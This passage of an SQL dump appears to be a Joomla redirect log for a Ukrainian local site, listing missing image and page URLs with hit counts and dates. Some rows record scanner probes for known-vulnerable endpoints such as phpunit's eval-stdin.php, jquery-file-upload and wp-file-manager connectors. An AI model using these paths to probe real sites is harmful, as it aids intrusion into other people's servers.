00:00:00',301),(36039,'http://malehus.in.ua/favicon.ico',NULL,'http://malehus.in.ua/index.php/2436-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-7-misyatsiv-2020-roku','',2,0,'2020-08-29 12:21:03','0000-00-00 00:00:00',301),(36040,'https://malehus.in.ua/modules/mod_zt_visitor_counter/assets/style/users.css.css',NULL,'https://malehus.in.ua/','',209,0,'2020-08-29 12:29:05','0000-00-00 00:00:00',301),(36041,'https://malehus.in.ua/modules/mod_zt_visitor_counter/assets/digit/style1.css.css',NULL,'https://malehus.in.ua/','',206,0,'2020-08-29 12:29:07','0000-00-00 00:00:00',301),(36042,'https://malehus.in.ua/favicon.ico',NULL,'https://malehus.in.ua/','',5866,0,'2020-08-29 12:29:12','0000-00-00 00:00:00',301),(36043,'https://malehus.in.ua/images/stories/vors_pokrova2014_0004.jpg',NULL,'https://malehus.in.ua/index.php?start=7','',1,0,'2020-08-29 16:55:02','0000-00-00 00:00:00',301),(36044,'https://malehus.in.ua/images/stories/vors_pokrova2014_0003.jpg',NULL,'https://malehus.in.ua/index.php?start=7','',1,0,'2020-08-29 16:55:03','0000-00-00 00:00:00',301),(36045,'https://malehus.in.ua/images/stories/vors_pokrova2014_0029.jpg',NULL,'https://malehus.in.ua/index.php?start=7','',1,0,'2020-08-29 16:55:03','0000-00-00 00:00:00',301),(36046,'https://malehus.in.ua/googlefff4a7126f020ac0.html',NULL,'','',1,0,'2020-08-29 17:14:44','0000-00-00 00:00:00',301),(36047,'https://malehus.in.ua/googlee1b8af28aecd4f4f.html',NULL,'','',19,0,'2020-08-29 17:14:44','0000-00-00 00:00:00',301),(36048,'https://malehus.in.ua/administrator/images/stories/censor.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2436','',8,0,'2020-08-29 19:26:13','0000-00-00 00:00:00',301),(36049,'https://malehus.in.ua/images/stories/hor.jpg',NULL,'https://malehus.in.ua/','',19,0,'2020-08-29 19:49:15','0000-00-00 00:00:00',301),(36050,'https://malehus.in.ua/administrator/images/stories/hor.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=1602','',3,0,'2020-08-30 06:08:19','0000-00-00 00:00:00',301),(36051,'https://malehus.in.ua/=tp1',NULL,'','',1,0,'2020-08-30 09:26:15','0000-00-00 00:00:00',301),(36052,'https://malehus.in.ua/https://malehus.in.ua/images/stories/censor.jpg',NULL,'https://malehus.in.ua/','',12,0,'2020-08-30 09:28:01','0000-00-00 00:00:00',301),(36053,'https://malehus.in.ua/administrator/images/stories/malyn_mikluho2.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-08-30 09:29:47','0000-00-00 00:00:00',301),(36054,'https://malehus.in.ua/administrator/images/stories/malyn_mikluho1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-08-30 09:29:52','0000-00-00 00:00:00',301),(36055,'https://malehus.in.ua/images/stories/vebcamer.jpg',NULL,'https://malehus.in.ua/','',8,0,'2020-08-30 09:35:29','0000-00-00 00:00:00',301),(36056,'https://malehus.in.ua/administrator/images/stories/gl_0004_640x480.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-08-30 14:06:10','0000-00-00 00:00:00',301),(36057,'https://malehus.in.ua/administrator/images/stories/gl_0006.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-08-30 14:06:24','0000-00-00 00:00:00',301),(36058,'https://malehus.in.ua/administrator/images/stories/gl_0001_640x480.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2449','',1,0,'2020-08-30 14:12:55','0000-00-00 00:00:00',301),(36059,'https://malehus.in.ua/administrator/images/stories/gl_0006_1280x960.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2449','',1,0,'2020-08-30 14:18:24','0000-00-00 00:00:00',301),(36060,'https://malehus.in.ua/administrator/images/stories/gl_0004_1280x960.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2449','',1,0,'2020-08-30 14:18:36','0000-00-00 00:00:00',301),(36061,'https://malehus.in.ua/administrator/images/stories/gl_0001_960x640.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2449','',1,0,'2020-08-30 14:23:56','0000-00-00 00:00:00',301),(36062,'https://malehus.in.ua/administrator/images/stories/gl_0006_960x640.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2449','',1,0,'2020-08-30 14:24:02','0000-00-00 00:00:00',301),(36063,'https://malehus.in.ua/administrator/images/stories/gl_0021_960x640.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2450','',1,0,'2020-08-30 14:40:24','0000-00-00 00:00:00',301),(36064,'https://malehus.in.ua/administrator/images/stories/gl_0012_960x640.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2450','',1,0,'2020-08-30 14:40:37','0000-00-00 00:00:00',301),(36065,'https://malehus.in.ua/administrator/images/stories/gl_0011_960x640.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2450','',1,0,'2020-08-30 14:40:44','0000-00-00 00:00:00',301),(36066,'https://malehus.in.ua/administrator/images/stories/gl_0018_960x640.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-08-30 14:44:45','0000-00-00 00:00:00',301),(36067,'https://malehus.in.ua/administrator/images/stories/gl_0026_960x640.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-08-30 14:48:30','0000-00-00 00:00:00',301),(36068,'https://malehus.in.ua/administrator/images/stories/sad_chereshn.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2454','',2,0,'2020-08-30 15:18:24','0000-00-00 00:00:00',301),(36069,'https://malehus.in.ua/index.php/kontakti',NULL,'https://malehus.in.ua/','',5,0,'2020-08-30 16:53:25','0000-00-00 00:00:00',301),(36070,'https://malehus.in.ua/https://malehus.in.ua/images/stories/gl_0021_960x640.jpg',NULL,'','',4,0,'2020-08-31 07:57:53','0000-00-00 00:00:00',301),(36071,'https://malehus.in.ua/modules/mod_zt_visitor_counter/assets/digit/style2.css.css',NULL,'https://malehus.in.ua/','',2,0,'2020-08-31 08:15:44','0000-00-00 00:00:00',301),(36072,'https://malehus.in.ua/modules/mod_zt_visitor_counter/assets/style/calendar.css.css',NULL,'https://malehus.in.ua/','',456,0,'2020-08-31 08:17:12','0000-00-00 00:00:00',301),(36073,'https://malehus.in.ua/modules/mod_zt_visitor_counter/assets/digit/style7.css.css',NULL,'https://malehus.in.ua/','',456,0,'2020-08-31 08:17:57','0000-00-00 00:00:00',301),(36074,'https://malehus.in.ua/https://malehus.in.ua/images/stories/gl_0001_960x640.jpg',NULL,'','',4,0,'2020-08-31 13:06:07','0000-00-00 00:00:00',301),(36075,'https://malehus.in.ua/images/stories/2paket33.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_gsd&view=config','',3,0,'2020-08-31 16:11:53','0000-00-00 00:00:00',301),(36076,'https://malehus.in.ua/https://malehus.in.ua/images/stories/gl_0026_960x640.jpg',NULL,'','',4,0,'2020-08-31 17:56:33','0000-00-00 00:00:00',301),(36077,'https://malehus.in.ua/https://malehus.in.ua/images/stories/gl_0018_960x640.jpg',NULL,'','',4,0,'2020-09-01 05:33:40','0000-00-00 00:00:00',301),(36078,'https://malehus.in.ua//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_red_20.png',NULL,'','',2,0,'2020-09-01 12:29:51','0000-00-00 00:00:00',301),(36079,'https://malehus.in.ua/administrator/images/stories/biomix1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-02 06:34:06','0000-00-00 00:00:00',301),(36080,'https://malehus.in.ua/administrator/images/stories/timox1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-02 06:39:40','0000-00-00 00:00:00',301),(36081,'https://malehus.in.ua/administrator/images/stories/nutrifarm1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-02 06:55:17','0000-00-00 00:00:00',301),(36082,'https://malehus.in.ua/administrator/images/stories/tilociklin.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-02 07:08:43','0000-00-00 00:00:00',301),(36083,'https://malehus.in.ua/administrator/images/stories/prazifen1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-02 07:13:11','0000-00-00 00:00:00',301),(36084,'https://malehus.in.ua/administrator/images/stories/metronidazol20.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-02 07:17:08','0000-00-00 00:00:00',301),(36085,'https://malehus.in.ua/administrator/components/com_phocagallery/assets/jcp/picker.js',NULL,'https://malehus.in.ua/administrator/index.php?option=com_phocagallery&view=phocagalleryt','',7,0,'2020-09-02 11:46:17','0000-00-00 00:00:00',301),(36086,'https://malehus.in.ua/administrator/images/stories/fotogaleri/malyn_nash000021.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_phocagallery&view=phocagalleryc&layout=edit','',1,0,'2020-09-02 12:12:10','0000-00-00 00:00:00',301),(36087,'https://malehus.in.ua/administrator/images/stories/fotogaleri/malyn_nash000003.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_phocagallery&view=phocagalleryimg&layout=edit','',2,0,'2020-09-02 12:14:16','0000-00-00 00:00:00',301),(36088,'https://malehus.in.ua/administrator/images/stories/ivermikolgol.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2020-09-03 06:09:25','0000-00-00 00:00:00',301),(36089,'https://malehus.in.ua/administrator/images/stories/apramicin.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-03 06:48:08','0000-00-00 00:00:00',301),(36090,'https://malehus.in.ua/administrator/images/stories/gpost_20200903_00093.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_phocagallery&view=phocagalleryimg&layout=edit&id=69','',2,0,'2020-09-03 16:42:00','0000-00-00 00:00:00',301),(36091,'https://malehus.in.ua/images/phocagallery/thumbs/phoca_thumb_l_поштові голуби',NULL,'https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holuby','',2,0,'2020-09-03 17:00:01','0000-00-00 00:00:00',301),(36092,'https://malehus.in.ua/administrator/images/stories/golub_log_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_phocagallery&view=phocagalleryc&layout=edit&id=4','',1,0,'2020-09-03 17:52:28','0000-00-00 00:00:00',301),(36093,'https://malehus.in.ua/administrator/images/stories/gpost_20200903_00080.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-03 17:59:33','0000-00-00 00:00:00',301),(36094,'https://malehus.in.ua/assets.pinterest.com/images/pidgets/pinit_fg_en_rect_red_20.png',NULL,'','',5499,0,'2020-09-03 18:47:01','0000-00-00 00:00:00',301),(36095,'https://malehus.in.ua/index.php/foto/video',NULL,'https://www.google.com/','',8,0,'2020-09-03 21:36:53','0000-00-00 00:00:00',301),(36096,'https://malehus.in.ua/administrator/images/stories/post_gol.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2466','',1,0,'2020-09-06 14:04:20','0000-00-00 00:00:00',301),(36097,'https://malehus.in.ua/https://malehus.in.ua/images/stories/post_gol.jpg',NULL,'','',5,0,'2020-09-08 12:05:42','0000-00-00 00:00:00',301),(36098,'https://malehus.in.ua/ads.txt',NULL,'','',1112,0,'2020-09-08 21:26:08','0000-00-00 00:00:00',301),(36099,'https://malehus.in.ua/administrator/images/stories/korrai.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-10 12:45:01','0000-00-00 00:00:00',301),(36100,'https://malehus.in.ua/administrator/images/stories/korrai1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2468','',1,0,'2020-09-10 12:52:55','0000-00-00 00:00:00',301),(36101,'https://malehus.in.ua/administrator/images/stories/okrug_7.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-10 13:17:16','0000-00-00 00:00:00',301),(36102,'https://malehus.in.ua/https://malehus.in.ua/images/stories/okrug_7.jpg',NULL,'','',4,0,'2020-09-10 13:25:26','0000-00-00 00:00:00',301),(36103,'https://malehus.in.ua/administrator/images/stories/malyn_okrugi.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-12 13:47:44','0000-00-00 00:00:00',301),(36104,'https://malehus.in.ua/https://malehus.in.ua/images/stories/malyn_okrugi.jpg',NULL,'','',6,0,'2020-09-12 13:48:41','0000-00-00 00:00:00',301),(36105,'https://malehus.in.ua/administrator/images/stories/dox8m2020_rnn.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2020-09-14 13:25:58','0000-00-00 00:00:00',301),(36106,'https://malehus.in.ua/https://malehus.in.ua/images/stories/dox8m2020_rnn.jpg',NULL,'','',28,0,'2020-09-14 13:31:38','0000-00-00 00:00:00',301),(36107,'https://malehus.in.ua/null',NULL,'','',1,0,'2020-09-14 14:25:17','0000-00-00 00:00:00',301),(36108,'https://malehus.in.ua/apple-touch-icon-precomposed.png',NULL,'','',18,0,'2020-09-14 14:27:49','0000-00-00 00:00:00',301),(36109,'https://malehus.in.ua/apple-touch-icon.png',NULL,'','',18,0,'2020-09-14 14:27:49','0000-00-00 00:00:00',301),(36110,'https://malehus.in.ua/https://malehus.in.ua/images/stories/korrai.jpg',NULL,'','',3,0,'2020-09-14 23:56:39','0000-00-00 00:00:00',301),(36111,'https://malehus.in.ua/https://malehus.in.ua/images/stories/metronidazol20.jpg',NULL,'','',1,0,'2020-09-14 23:57:12','0000-00-00 00:00:00',301),(36112,'https://malehus.in.ua/https://malehus.in.ua/images/stories/timox1.jpg',NULL,'','',2,0,'2020-09-14 23:57:21','0000-00-00 00:00:00',301),(36113,'https://malehus.in.ua/https://malehus.in.ua/images/stories/biomix1.jpg',NULL,'','',2,0,'2020-09-14 23:57:25','0000-00-00 00:00:00',301),(36114,'https://malehus.in.ua/https://malehus.in.ua/images/stories/ivermikolgol.jpg',NULL,'','',3,0,'2020-09-14 23:57:50','0000-00-00 00:00:00',301),(36115,'https://malehus.in.ua/https://malehus.in.ua/images/stories/nutrifarm1.jpg',NULL,'','',1,0,'2020-09-14 23:57:52','0000-00-00 00:00:00',301),(36116,'https://malehus.in.ua/https://malehus.in.ua/images/stories/tilociklin.jpg',NULL,'','',3,0,'2020-09-14 23:57:57','0000-00-00 00:00:00',301),(36117,'https://malehus.in.ua/https://malehus.in.ua/images/stories/apramicin.jpg',NULL,'','',3,0,'2020-09-14 23:58:20','0000-00-00 00:00:00',301),(36118,'https://malehus.in.ua/https://malehus.in.ua/images/stories/gpost_20200903_00080.jpg',NULL,'','',2,0,'2020-09-14 23:58:34','0000-00-00 00:00:00',301),(36119,'https://malehus.in.ua/administrator/images/stories/0502.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-09-15 13:01:56','0000-00-00 00:00:00',301),(36120,'https://malehus.in.ua/https://malehus.in.ua/images/stories/0502.jpg',NULL,'','',3,0,'2020-09-15 13:04:04','0000-00-00 00:00:00',301),(36121,'https://malehus.in.ua/apple-touch-icon-120x120-precomposed.png',NULL,'','',1,0,'2020-09-18 15:50:32','0000-00-00 00:00:00',301),(36122,'https://malehus.in.ua/apple-touch-icon-120x120.png',NULL,'','',1,0,'2020-09-18 15:50:32','0000-00-00 00:00:00',301),(36123,'https://malehus.in.ua/administrator/images/stories/vybory.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',2,0,'2020-09-29 17:45:25','0000-00-00 00:00:00',301),(36124,'https://malehus.in.ua/https://malehus.in.ua/images/stories/vybory.jpg',NULL,'','',1,0,'2020-09-29 17:49:46','0000-00-00 00:00:00',301),(36125,'https://malehus.in.ua/administrator/tabaka',NULL,'','',1,0,'2020-10-10 09:04:00','0000-00-00 00:00:00',301),(36126,'https://malehus.in.ua/administrator/images/stories/es.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-10-10 09:07:48','0000-00-00 00:00:00',301),(36127,'https://malehus.in.ua/https://malehus.in.ua/images/stories/es.jpg',NULL,'','',1,0,'2020-10-10 09:15:07','0000-00-00 00:00:00',301),(36128,'https://malehus.in.ua/administrator/images/stories/buliten.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2477','',1,0,'2020-10-11 06:55:15','0000-00-00 00:00:00',301),(36129,'https://malehus.in.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'','',4,0,'2020-10-11 21:45:53','0000-00-00 00:00:00',301),(36130,'https://malehus.in.ua/administrator/images/stories/agmi1_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-10-12 13:50:06','0000-00-00 00:00:00',301),(36131,'https://malehus.in.ua/administrator/images/stories/pokrova.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-10-14 05:34:22','0000-00-00 00:00:00',301),(36132,'https://malehus.in.ua/administrator/images/stories/army.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-10-14 05:45:59','0000-00-00 00:00:00',301),(36133,'https://malehus.in.ua/https://malehus.in.ua/images/stories/army.jpg',NULL,'','',4,0,'2020-10-14 06:10:06','0000-00-00 00:00:00',301),(36134,'https://malehus.in.ua/administrator/images/stories/121583240_2681999248716544_2877998491819098657_o.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2476','',1,0,'2020-10-14 10:59:15','0000-00-00 00:00:00',301),(36135,'https://malehus.in.ua/administrator/images/stories/121590708_2681999345383201_5919276304195832110_o.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2476','',1,0,'2020-10-14 11:00:19','0000-00-00 00:00:00',301),(36136,'https://malehus.in.ua/administrator/images/stories/121591967_2681999442049858_1447389506059112388_o.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2476','',1,0,'2020-10-14 11:01:04','0000-00-00 00:00:00',301),(36137,'https://malehus.in.ua/administrator/images/stories/121567243_2681999518716517_8231678393837593391_o.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2476','',1,0,'2020-10-14 11:01:47','0000-00-00 00:00:00',301),(36138,'https://malehus.in.ua/https://malehus.in.ua/images/stories/sad_chereshn.jpg',NULL,'','',3,0,'2020-10-16 02:44:22','0000-00-00 00:00:00',301),(36139,'https://malehus.in.ua/administrator/images/stories/es_nas.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-10-19 12:08:34','0000-00-00 00:00:00',301),(36140,'https://malehus.in.ua/https://malehus.in.ua/images/stories/es_nas.jpg',NULL,'','',1,0,'2020-10-19 12:11:09','0000-00-00 00:00:00',301),(36141,'https://malehus.in.ua///assets.pinterest.com/images/pidgets/pinit_fg_en_rect_red_20.png',NULL,'','',1,0,'2020-10-19 17:52:46','0000-00-00 00:00:00',301),(36142,'https://malehus.in.ua/administrator/images/stories/nasik.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2483','',1,0,'2020-10-24 05:20:35','0000-00-00 00:00:00',301),(36143,'https://malehus.in.ua/administrator/images/stories/mer.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-10-29 16:36:13','0000-00-00 00:00:00',301),(36144,'https://malehus.in.ua/https://malehus.in.ua/images/stories/mer.jpg',NULL,'','',6,0,'2020-10-29 16:40:29','0000-00-00 00:00:00',301),(36145,'https://malehus.in.ua/administrator/images/stories/gaz11_20.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-10-31 10:58:57','0000-00-00 00:00:00',301),(36146,'https://malehus.in.ua/https://malehus.in.ua/images/stories/gaz11_20.jpg',NULL,'','',1,0,'2020-10-31 11:00:39','0000-00-00 00:00:00',301),(36147,'https://malehus.in.ua/https://malehus.in.ua/images/stories/nasik.jpg',NULL,'','',2,0,'2020-11-03 11:19:43','0000-00-00 00:00:00',301),(36148,'https://malehus.in.ua/connect.facebook.net/uk_ua/sdk.js',NULL,'','',1829,0,'2020-11-08 18:34:08','0000-00-00 00:00:00',301),(36149,'https://malehus.in.ua///connect.facebook.net/uk_ua/sdk.js',NULL,'','',4,0,'2020-11-08 18:40:24','0000-00-00 00:00:00',301),(36150,'https://www.malehus.in.ua/.well-known/security.txt',NULL,'','',1,0,'2020-11-13 02:17:24','0000-00-00 00:00:00',301),(36151,'https://malehus.in.ua/https://malehus.in.ua/images/stories/pokrova.jpg',NULL,'','',1,0,'2020-11-25 02:24:20','0000-00-00 00:00:00',301),(36152,'https://malehus.in.ua/administrator/images/stories/12_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-15 18:20:01','0000-00-00 00:00:00',301),(36153,'https://malehus.in.ua/administrator/images/stories/12_2.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2488','',1,0,'2020-12-15 18:21:46','0000-00-00 00:00:00',301),(36154,'https://malehus.in.ua/administrator/images/stories/12_3.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2488','',4,0,'2020-12-15 18:24:14','0000-00-00 00:00:00',301),(36155,'https://malehus.in.ua/administrator/images/stories/12_4.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2488','',8,0,'2020-12-15 18:24:36','0000-00-00 00:00:00',301),(36156,'https://malehus.in.ua/administrator/images/stories/12_5.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2488','',1,0,'2020-12-15 18:28:10','0000-00-00 00:00:00',301),(36157,'https://malehus.in.ua/administrator/images/stories/12_6.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=2488','',2,0,'2020-12-15 18:37:00','0000-00-00 00:00:00',301),(36158,'https://malehus.in.ua/https://malehus.in.ua/images/stories/12_1.jpg',NULL,'','',4,0,'2020-12-15 18:41:52','0000-00-00 00:00:00',301),(36159,'https://malehus.in.ua/administrator/images/stories/12_k_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-15 18:53:46','0000-00-00 00:00:00',301),(36160,'https://malehus.in.ua/administrator/images/stories/12_k_2.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-15 18:53:57','0000-00-00 00:00:00',301),(36161,'https://malehus.in.ua/administrator/images/stories/12_k_3.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-15 18:54:08','0000-00-00 00:00:00',301),(36162,'https://malehus.in.ua/https://malehus.in.ua/images/stories/12_k_1.jpg',NULL,'','',3,0,'2020-12-15 18:56:47','0000-00-00 00:00:00',301),(36163,'https://malehus.in.ua/administrator/images/stories/malll1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_contact&view=contact&layout=edit&id=1','',28,0,'2020-12-16 10:05:31','0000-00-00 00:00:00',301),(36164,'https://malehus.in.ua/administrator/images/stories/1612_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-16 12:43:55','0000-00-00 00:00:00',301),(36165,'https://malehus.in.ua/index.php/rizni-porady',NULL,'https://malehus.in.ua/','',1,0,'2020-12-16 14:01:27','0000-00-00 00:00:00',301),(36166,'https://malehus.in.ua/wp-login.php',NULL,'http://malehus.in.ua/wp-login.php','',691,0,'2020-12-16 23:08:07','0000-00-00 00:00:00',301),(36167,'https://malehus.in.ua/administrator/images/stories/20201221_03.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-21 14:53:49','0000-00-00 00:00:00',301),(36168,'https://malehus.in.ua/administrator/images/stories/20201221_05.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-21 14:54:01','0000-00-00 00:00:00',301),(36169,'https://malehus.in.ua/https://malehus.in.ua/images/stories/20201221_03.jpg',NULL,'','',2,0,'2020-12-21 14:55:58','0000-00-00 00:00:00',301),(36170,'https://malehus.in.ua/images/stories/2012_2.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_modules&view=module&layout=edit&id=167','',210,0,'2020-12-23 20:05:57','0000-00-00 00:00:00',301),(36171,'https://malehus.in.ua/administrator/images/stories/2021_1.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2020-12-29 12:52:00','0000-00-00 00:00:00',301),(36172,'https://malehus.in.ua//wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:23','0000-00-00 00:00:00',301),(36173,'https://malehus.in.ua//blog/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:24','0000-00-00 00:00:00',301),(36174,'https://malehus.in.ua//wordpress/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:25','0000-00-00 00:00:00',301),(36175,'https://malehus.in.ua//website/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:25','0000-00-00 00:00:00',301),(36176,'https://malehus.in.ua//wp/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:25','0000-00-00 00:00:00',301),(36177,'https://malehus.in.ua//news/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:25','0000-00-00 00:00:00',301),(36178,'https://malehus.in.ua//media/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2021-01-02 17:37:26','0000-00-00 00:00:00',301),(36179,'https://malehus.in.ua//wp2/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:27','0000-00-00 00:00:00',301),(36180,'https://malehus.in.ua//site/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:27','0000-00-00 00:00:00',301),(36181,'https://malehus.in.ua//cms/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:27','0000-00-00 00:00:00',301),(36182,'https://malehus.in.ua//sito/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2021-01-02 17:37:27','0000-00-00 00:00:00',301),(36183,'https://malehus.in.ua/assets/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2021-01-03 16:13:41','0000-00-00 00:00:00',301),(36184,'https://malehus.in.ua/assets/global/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2021-01-03 16:13:41','0000-00-00 00:00:00',301),(36185,'https://malehus.in.ua/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',3,0,'2021-01-03 16:13:41','0000-00-00 00:00:00',301),(36186,'https://malehus.in.ua/public/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2021-01-04 02:49:58','0000-00-00 00:00:00',301),(36187,'https://malehus.in.ua/administrator/images/stories/4293668.gif',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-01-04 08:25:32','0000-00-00 00:00:00',301),(36188,'https://malehus.in.ua/administrator/images/stories/rizdvo.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-01-06 07:04:05','0000-00-00 00:00:00',301),(36189,'https://malehus.in.ua/https://malehus.in.ua/images/stories/agmi1_1.jpg',NULL,'','',1,0,'2021-01-08 13:54:21','0000-00-00 00:00:00',301),(36190,'https://www.malehus.in.ua//vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2021-01-09 06:08:10','0000-00-00 00:00:00',301),(36191,'https://www.malehus.in.ua//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',1,0,'2021-01-09 06:08:39','0000-00-00 00:00:00',301),(36192,'https://malehus.in.ua/administrator/images/stories/gaz0121.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2021-01-09 19:04:09','0000-00-00 00:00:00',301),(36193,'https://malehus.in.ua/https://malehus.in.ua/images/stories/gaz0121.jpg',NULL,'','',2,0,'2021-01-09 19:06:55','0000-00-00 